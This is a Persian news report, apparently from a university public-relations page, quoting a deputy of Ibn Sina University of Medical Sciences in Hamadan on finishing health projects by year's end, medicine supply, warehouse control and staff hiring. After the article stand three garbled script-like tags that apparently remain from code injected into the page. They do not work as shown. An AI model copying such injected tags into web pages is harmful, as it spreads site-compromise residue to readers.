معاون توسعه مدیریت و منابع دانشگاه علوم پزشکی ابن سینا:

همه پروژه‌های بهداشتی مورد نظر تا پایان امسال تمام‌می‌شود

معاون توسعه مدیریت و منابع دانشگاه علوم پزشکی ابن سینا با اشاره به اینکه تا پایان سال ۹۸ بدهی در حوزه پروژه ها وجود ندارد  گفت: همچنان اولویت پروژه های بهداشتی است و همه پروژه های بهداشتی مورد نظر تا پایان امسال تمام‌می‌شود.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه به نقل از پایگاه خبری وب‌دا در همدان، مهندس رحیمی اظهار کرد: اشراف دکتر حیدری مقدم به حوزه های مختلف دانشگاه و سابقه مدیریتی ایشان در بخش‌های مختلف بسیار بااهمیت و عامل موفقیت هر چه بیشتر دانشگاه خواهد بود.

وی با ببان اینکه در حوزه مالی و توسعه با همدلی مدیران شبکه وضعیت رو به جلو پیش می رود، گفت: اشتراک‌اطلاعات بر مبنای صداقت منجر به تصمیم گیری درست خواهد شد و با نگاه همه جانبه سال آرامی به پایان برسد.

تهیه داروها و ملزومات حیاتی و استراتژیک، کنترل سرمایه های موجود در انبارها با بازدیدهای منظم، توجه به نحوه انعقاد قراردادها و انجام برآوردهای مورد نظر پیش از قراردادها، توجه به سامانه مدیریت انرژی و برخورد با متخلفین، نگاه ویژه به اموال راکد و مازاد، استفاده مجدد و بازیافت وسایل مورد نیاز به سیستم، یکسان سازی انبارها،  بررسی نظام توزیع دارو از دیگر موارد مطرح شده توسط مهندس رحیمی بود.

مهندس رحیمی با تاکید بر اینکه خارج از جدول زمان بندی هیچ پروژه ای اضافه نمی‌شود اظهار کرد: تمام‌پروژه های شروع شده در دانشگاه در حوزه بهداشتی تا پایان امسال به پایان می‌رسد و هیچ پروژه بدون هویتی در دانشگاه وجود ندارد.

وی خاطر نشان کرد که پرداخت‌های پرسنلی و توجه به زیرساخت‌های مورد نیاز همچون دارو و ملزومات و تکمیل پروژه های بهداشتی همچنان در اولویت نخست دانشگاه قرار دارد.وی جلوگیری از انتقال استرس به مجموعه  با رفتار متعهدانه را از اولویتهای کار معاونت توسعه دانشگاه عنوان کرد و از برگزاری آزمون برای جذب نیروی بهداشتی و درمانی در ماههای آینده خبر داد‌.

توجه به خیرین سلامت و همچنین استفاده از ظرفیت آنان و پیدا کردن راهکاری برای خوداظهاری فشار خون توسط افراد شاغل در حوزه سلامت را پیشنهاد کرد.تجمیع واحدهای اداری مالی در ساختار شبکه های بهداشت و درمان و متمرکز تر دیدن ساختار آنها از دیگر موارد عنوان شده توسط مهندس رحیمی‌ بود.

 

 <2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *